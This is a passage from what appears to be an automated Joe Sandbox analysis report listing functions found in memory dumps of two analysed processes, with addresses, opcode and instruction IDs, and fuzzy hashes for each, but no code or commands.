Opcode Fuzzy Hash: a63caeafe71e66c71837db2d987bea30252ba987fcf5d50d7f638bb73b8242ab
Instruction Fuzzy Hash: EC110030E089198FDB64DB84C490BE9B3E1FB68314F1545ADD00EE72A1CA74AD81CF80

Function 00007FFD9B750C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05712e1aa92fd95ec87af7cb256b759f6aee33f7a0fd6a62ff5f9e3751da8ad7
Instruction ID: 69799f2035d0c2e5673bf60a97bc95d8712d56bcdb6014a77c55be4c999690cb
Opcode Fuzzy Hash: 05712e1aa92fd95ec87af7cb256b759f6aee33f7a0fd6a62ff5f9e3751da8ad7
Instruction Fuzzy Hash: D3016D35A0E38D8FE7259BA888611DC7BB0EF03600F1642B7D044DB1E2D9786A468740

Function 00007FFD9B750C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a48cce62ae46b7c895b9767c162a252b9364bc7c37e9334058f6817fbc3e1102
Instruction ID: 6e8ec3d5b23888010311546f4d464b5e3a53837c7f9632917a8e0487e481bf6c
Opcode Fuzzy Hash: a48cce62ae46b7c895b9767c162a252b9364bc7c37e9334058f6817fbc3e1102
Instruction Fuzzy Hash: E0015A35E0E3899FE7219BE888A01EC7BB0EF03700F1542E7D044DB2A6D9786A468740

Function 00007FFD9B756CA8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f1d44ed2398df131afb60680c80c49b82f98432820131c03a4da626899f8144
Instruction ID: 797b2e2008a44e38cbd42c8e46cb19cca5fea4105e37c992581f5ba4114108ff
Opcode Fuzzy Hash: 6f1d44ed2398df131afb60680c80c49b82f98432820131c03a4da626899f8144
Instruction Fuzzy Hash: F3F01D30B1961E8AEB74E6C4C8647F873A1FB94321F1542B6C00D971B5DE78BA828B00

Function 00007FFD9B756C7F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb39302c7505ec9c3adc14a3c7571d635a0527fcaeb3df4c1df4b5184be1f390
Instruction ID: 4c9ce2d35543b0e3e2f00bb0ec11bccabcc354d2e472c0c1a823e6a3a849c4be
Opcode Fuzzy Hash: cb39302c7505ec9c3adc14a3c7571d635a0527fcaeb3df4c1df4b5184be1f390
Instruction Fuzzy Hash: 80F05B30B0960D46EB70D7C4C4607B83352EF51321F1503B6C40D972F1DD68BE438640

Function 00007FFD9B750CF0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5d983ffa8f69929640fb86e63711cf7bcfc4af2c4c48bc07db6f1a6da297d0
Instruction ID: 07c8636798f00b6b0aff55ffd1a91be77c9b29af6fe7923de0755dda0081b688
Opcode Fuzzy Hash: 3c5d983ffa8f69929640fb86e63711cf7bcfc4af2c4c48bc07db6f1a6da297d0
Instruction Fuzzy Hash: 43F03A70A0970A8AE754DBD4C4A87E977A1FB52710F4546B5D008862EAEAB866858B80

Function 00007FFD9B751F35 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc407d1fb674ac52227976c44cab15dc4c82b2498b6bde7139b554587f7127f
Instruction ID: 54855c30a0294ac79f90a564f9b1f2ed5dd0925b10989f5d973e13459d961920
Opcode Fuzzy Hash: 6bc407d1fb674ac52227976c44cab15dc4c82b2498b6bde7139b554587f7127f
Instruction Fuzzy Hash: B5E07D20F1A61D4FEEA4F7E48465A7862D2DF95301F4A46B4D40FC72F6DD98AD024641

Function 00007FFD9B756218 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c1c2fc2f614400afc7861cea9c74a06ca3a48c59020dd27f285223754e4f5a6
Instruction ID: 1683bb8955bd1bfb0a01156756d68ac7a1a72549b50ca84cbdb14c4f1227e1d6
Opcode Fuzzy Hash: 1c1c2fc2f614400afc7861cea9c74a06ca3a48c59020dd27f285223754e4f5a6
Instruction Fuzzy Hash: 92E01220F0961A47FBE49584D860BE97265EB54300F1552B8D50F933F1CE78AF46C706

Function 00007FFD9B750B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3100f1d73544b6d7750cc4bee107f60b1d2f65f6fa2b703a318a81b2c845b6
Instruction ID: c31a7b7958cad31398f035c354a885723259ff5c8d07dcc1f7867ffa2b3d5110
Opcode Fuzzy Hash: 7d3100f1d73544b6d7750cc4bee107f60b1d2f65f6fa2b703a318a81b2c845b6
Instruction Fuzzy Hash: 8DC08C30A29A0E8FDA40FB7CC888C24BBE0FF4E301BDA00E0E00CCB1B1D6999891D704

Function 00007FFD9B7506A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f385cb86ca1661c4f2e1f57ae6232f9eb834de6f892b1153d04bcfe9d1e2ab2
Instruction ID: a3709e57813d84362e51ad4635dc1726021674ca1e2cd724396315018ac0f647
Opcode Fuzzy Hash: 5f385cb86ca1661c4f2e1f57ae6232f9eb834de6f892b1153d04bcfe9d1e2ab2
Instruction Fuzzy Hash: 55C00205F5B61E11E42575EA54660ADB140AFD6A10FD60272D509401B5988E22970156

Function 00007FFD9B757165 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcebcbb721cdef874f68c37805c86e9e330bda093aa90484d69ae369641b327d
Instruction ID: 6610c039e09e696f11ea3e46d3016f62eb3d4fb1991a751f112eb09ae027aec0
Opcode Fuzzy Hash: bcebcbb721cdef874f68c37805c86e9e330bda093aa90484d69ae369641b327d
Instruction Fuzzy Hash: B8C04C21F18C2A46F75A765444316BE05439B54708F9502B4F41F977DECD5C5F0302CA

Function 00007FFD9B7506C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce31640aa32ed8f1bedd4a0d005b38809c64bcd8d093074238d8c7d7e6528b0b
Instruction ID: 3fe2870550a02d0389e0cc2c554f914ef3de553e6f540dba072c7e4f20a5a1e3
Opcode Fuzzy Hash: ce31640aa32ed8f1bedd4a0d005b38809c64bcd8d093074238d8c7d7e6528b0b
Instruction Fuzzy Hash: 51B01200D5750F00E42431FA08520B970405F45200FC20270D40C401B598CD13970253

Function 00007FFD9B7547BC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1780042350.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b750000_MsAgentDriverruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af273b16d3f83d1f9aad3dc8d2ec6007d67945d0958983c25d11b4576795d42
Instruction ID: a3e5aaf7f20bc7becb3876e5e4594f390583cbb9f8a2bcbdccb35a7bde08f970
Opcode Fuzzy Hash: 9af273b16d3f83d1f9aad3dc8d2ec6007d67945d0958983c25d11b4576795d42
Instruction Fuzzy Hash:

Analysis Process: WBnjVTGHzbhirvM.exePID: 7948, Parent PID: 7732COMMON

Executed Functions

Function 00007FFD9BB7E214 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e1ec7d517e94b7ed665eff0ee1c4147100ab4d36446440c5d26ae4ada8c238
Instruction ID: 7ef6b62eb654445b6dd76b50ca7080b7b6688c8f537bc6ad556f6304266674a1
Opcode Fuzzy Hash: 39e1ec7d517e94b7ed665eff0ee1c4147100ab4d36446440c5d26ae4ada8c238
Instruction Fuzzy Hash: 21D1F531B19A4D4FEBA8EB6884B96B973D1FF98304F41027AD40EC76E2DE247D418741

Function 00007FFD9B780D78 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e987af10689e05fb5828e9c205018c95374bd7fe45cbe8305538bed8e7bd66c
Instruction ID: 54bd51bba4d2a0c55db6965783a46c04c1be2ccbc62338939c874b512dbff35d
Opcode Fuzzy Hash: 2e987af10689e05fb5828e9c205018c95374bd7fe45cbe8305538bed8e7bd66c
Instruction Fuzzy Hash: 2291E175A18A8D8FE799DF6888797A9BFE1FF99311F0002BAD049C32E6DE7814058740

Function 00007FFD9BB8051D Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a7a440a964d7fb0e469d99b7fbccaa5893c00dea4367ea7f19482b01483c87
Instruction ID: 99afa4f5ba75ec2eff2d1239c0d2eb70ab0b34865c544a83653e9b3db735800b
Opcode Fuzzy Hash: f0a7a440a964d7fb0e469d99b7fbccaa5893c00dea4367ea7f19482b01483c87
Instruction Fuzzy Hash: EB711621B0EF4D0FE3A5EB6844796B977C1FF98754F8501BED44DC71E2DE24AA028282

Function 00007FFD9BB739B2 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BB73A22

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1e1112ba018df9db95343d5324e86283a99d43dabd788171504f04c781aa69ef
Instruction ID: 030dcfd99e810b29a5c75009d6d4b19027f0defea2d46f8fddb5352b634c7bfb
Opcode Fuzzy Hash: 1e1112ba018df9db95343d5324e86283a99d43dabd788171504f04c781aa69ef
Instruction Fuzzy Hash: C4518071E0A54E8FDB59CB94C4A15BCBBB1FF45304F1100BAD01EE76E2DA392A02CB11

Function 00007FFD9B7812F8 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B78904A

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 7a0afe018486a8ead9a05808451d190b401c9d341c23edfe224b68f613cd9fa6
Instruction ID: aaf2c2458938280a928ea1e43220e116c1891cca8aaf722bc1abb7430d4de647
Opcode Fuzzy Hash: 7a0afe018486a8ead9a05808451d190b401c9d341c23edfe224b68f613cd9fa6
Instruction Fuzzy Hash: 29412A31A0EBC94FE75697748CB55A93BA1EF56301F0A02FBD049C71F7DD2869098391

Function 00007FFD9B780C25 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B780C69

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 7bc642b5fb51b680f48d5492290116b6b9865ce728b8457a241c140000e4c5bb
Instruction ID: 98663462bb8cad75ffc298821226b2c1385780cd1e7dfb2ab31accdccabf3abd
Opcode Fuzzy Hash: 7bc642b5fb51b680f48d5492290116b6b9865ce728b8457a241c140000e4c5bb
Instruction Fuzzy Hash: 05310B35B0EB4D8EE311AB6898A55EC7B60EF42311F0543F7D018861F3DE3826458B41

Function 00007FFD9B7811A1 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9B78124A

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: f5744ee2d536543a2394829364abfc2c7c827b9bb97e711620cc2862c0198afb
Instruction ID: 1a5a0532d4025d622824312b3e817ad2331f56b8af6bea00217210efb2eb8794
Opcode Fuzzy Hash: f5744ee2d536543a2394829364abfc2c7c827b9bb97e711620cc2862c0198afb
Instruction Fuzzy Hash: DC31A730E0964E8FDB45EBA4C4A49B977F0FF5A311F0505BAC009D72B6DA38A945C750

Function 00007FFD9B780C38 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B780C69

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: a5341c82bd7dc073e397113fa1f04e5c6881f2db1dc32b7a999545d2ffec9a2f
Instruction ID: 080f957e36e5b561886f9c27cb41f1a94f9cd486041b5cd402dcca918d2999b9
Opcode Fuzzy Hash: a5341c82bd7dc073e397113fa1f04e5c6881f2db1dc32b7a999545d2ffec9a2f
Instruction Fuzzy Hash: 7A117335B0EB4D8EE7119B6488A15EC7BB0EF42712F1546F7C044DB1E2D93826458790

Function 00007FFD9B780C40 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B780C69

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 16719897302def2be75e072de8b28052232e95ce90d63cd4ad5d98bd1223badd
Instruction ID: dbe5c98efdafc1e4b878fef170928e3da1052282fd72e12514a73f70e34305e9
Opcode Fuzzy Hash: 16719897302def2be75e072de8b28052232e95ce90d63cd4ad5d98bd1223badd
Instruction Fuzzy Hash: 1101A135A0AB8D8FE712DF6488A05EC7BB0EF42711F0542F7C044DB2E2D93826498B90

Function 00007FFD9B780C48 Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B780C69

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: b20e9e601098d82f36e420e77c897b6f94d298534e4e2666d6092841216aa1b9
Instruction ID: cde81496e79717745ad2ca635f843a98bdd8c470543fc158db7f9bf4e4a2d16f
Opcode Fuzzy Hash: b20e9e601098d82f36e420e77c897b6f94d298534e4e2666d6092841216aa1b9
Instruction Fuzzy Hash: 37019E35A0E7898FD712DFB4C8A05DC7BB0EF02711F1542F7C044DB2A6DA3866498B80

Function 00007FFD9B780C50 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9B780C69

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 090d6a5296ed8fcfb92c8f329a7206d83efcff760a77d0def30a47a2c99cb8b6
Instruction ID: 2e1f467f44bb59ffa12395f5fd44fece2e87f165536e3bddaa9c5f8290481cb9
Opcode Fuzzy Hash: 090d6a5296ed8fcfb92c8f329a7206d83efcff760a77d0def30a47a2c99cb8b6
Instruction Fuzzy Hash: F3018F34E0E7899FE711DBB488A05ED7BB0EF02705F1542F7C444DB2A6D93866448740

Function 00007FFD9BB7DBA9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BB7DBC6

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 2de9f7784967c23fef57253272f037436cc46213e40e90738563badf4fe96624
Instruction ID: 0924f7993b7761a396fbbf174ec6f621106fe6026b31b105b38eea688a9b66a9
Opcode Fuzzy Hash: 2de9f7784967c23fef57253272f037436cc46213e40e90738563badf4fe96624
Instruction Fuzzy Hash: CEE01AB154A3C44FCB56AA7488A59443FB0EE6B25178A41EEC04ACB2B3E62E9949C701

Function 00007FFD9BB81099 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BB810B6

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 2f5f9f30418a904c97c9a16c72b928a8ae03f9b1252d1cfd267692fa1f5e26da
Instruction ID: debd151b4951366d7078a4063cd6a063fdfabdfcc4fc0a15fe33c9340c5324cb
Opcode Fuzzy Hash: 2f5f9f30418a904c97c9a16c72b928a8ae03f9b1252d1cfd267692fa1f5e26da
Instruction Fuzzy Hash: 98E01A6194F7C44FCB56EB74886A8447FA1EE6B22078B41EEC086CF1B3E62D8849C701

Function 00007FFD9BB74C61 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23c550a29028c0956d9b70673f6cf0d5ccf3864d07796522f07fdeba7c0d031
Instruction ID: d08ccc6b42e221de0d5dfdbae97e8dc146106f47f99fa045e4364604fff7a4f4
Opcode Fuzzy Hash: c23c550a29028c0956d9b70673f6cf0d5ccf3864d07796522f07fdeba7c0d031
Instruction Fuzzy Hash: 2FD10630B1EA4A8FE378DB58D4E057977E1FF44319B11057DC08EC3AE2DA29BA468781

Function 00007FFD9BB734D2 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623451430409eaaa94327de57f3f2bd4312a1479040e1afcaff87982da2b995a
Instruction ID: 65b7dac9e94478eb9e2ecccf8afbc66293830e053a4724d2921726d31b889153
Opcode Fuzzy Hash: 623451430409eaaa94327de57f3f2bd4312a1479040e1afcaff87982da2b995a
Instruction Fuzzy Hash: 96B1F270B0EA4A8FE759DB58C0A06A4B7A1FF48304F554179D04EC7ED6DB28FA52CB81

Function 00007FFD9BB70E97 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7688b6f97a8ee1d9fc01e935e15ad91012af03170350188acdb82782a1c30c2e
Instruction ID: da6c12de577ff57dff1d2d8462a16768ac5e90e449b47ee36d6b73d26d33dc7a
Opcode Fuzzy Hash: 7688b6f97a8ee1d9fc01e935e15ad91012af03170350188acdb82782a1c30c2e
Instruction Fuzzy Hash: E421EA16F1F19A8EF67461E829B35FC6650EF50329F1B0577E44E878E2DD0C3A8052A2

Function 00007FFD9BB73D3A Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c547cfbe1c753e223ce66e9ba11139bbff2c1b5f6a88a3afac00b6c40dfe9ea
Instruction ID: e112c8df309c419afced290e41f7f58ccd698fcc796493b53b44b95c5213a420
Opcode Fuzzy Hash: 1c547cfbe1c753e223ce66e9ba11139bbff2c1b5f6a88a3afac00b6c40dfe9ea
Instruction Fuzzy Hash: 87B1A23061A65A8FEB58CF58C0E05B437A1FF45314B5546BDD84F8BA9AC638F982CB81

Function 00007FFD9BB72A06 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf443878fc113baee8e008abc5285539277c04c61e03405a731371020a8c9f0e
Instruction ID: eee36c2be3825bbc729b1a38461c1ceec0f772a7c7826505489d57b87f4ec6f0
Opcode Fuzzy Hash: bf443878fc113baee8e008abc5285539277c04c61e03405a731371020a8c9f0e
Instruction Fuzzy Hash: 97810931A0F64A4FE7789ED894A517D77E0FF46318F11057ED09EC3AE2DA2976028741

Function 00007FFD9BB70B49 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88cf575cf267695c19dadc24156e0bba174afd5f5cf2ef400a0a945c9e39f00
Instruction ID: a4efef63af62920d436b1216270940c1a6b8346287750d811a4b51dc11c3d3ad
Opcode Fuzzy Hash: d88cf575cf267695c19dadc24156e0bba174afd5f5cf2ef400a0a945c9e39f00
Instruction Fuzzy Hash: A7716B71B0E54D4FEF78DA6888AA5B937C0FF44714B52027BD05EC7AF2DD58AA068381

Function 00007FFD9BB7170B Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa3ea44e0273d8d9ccc6635ad209924d7f193b03f7a04f6d973f4cb16cb2aa8
Instruction ID: eab82d25e3c80b8cbf6d613ea667f1554cdd014fe24eaf8ba30ec414ed29d2d3
Opcode Fuzzy Hash: 2fa3ea44e0273d8d9ccc6635ad209924d7f193b03f7a04f6d973f4cb16cb2aa8
Instruction Fuzzy Hash: 7871F530E1E54E8FEB65DBA888A46BD7BB1FF45304F1101BAD00ED75E1EE3869418760

Function 00007FFD9BB73C1F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9e8a93b1cacc016b590639355f69846a23462dd34ce674fd3730d33c65cada
Instruction ID: 3dd8ad189e7f5eb97290990524c11a97fdfd6312109e1063dd22f390280aaeb9
Opcode Fuzzy Hash: 9c9e8a93b1cacc016b590639355f69846a23462dd34ce674fd3730d33c65cada
Instruction Fuzzy Hash: 3B812530A1E54A8FEB29CF58C4E46B97BA1FF51304F0441BDC44E8B5DBCA38AA41C782

Function 00007FFD9BB73C3F Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ea1ff458a9caa323ac28ef4ac43f95e3140fc37a80efffb077fbdb07e831b2
Instruction ID: f9ba6c8db67ccbbb911bfb15d0708933c49a94bfdf9913ed4dcf3b02ba3a3a13
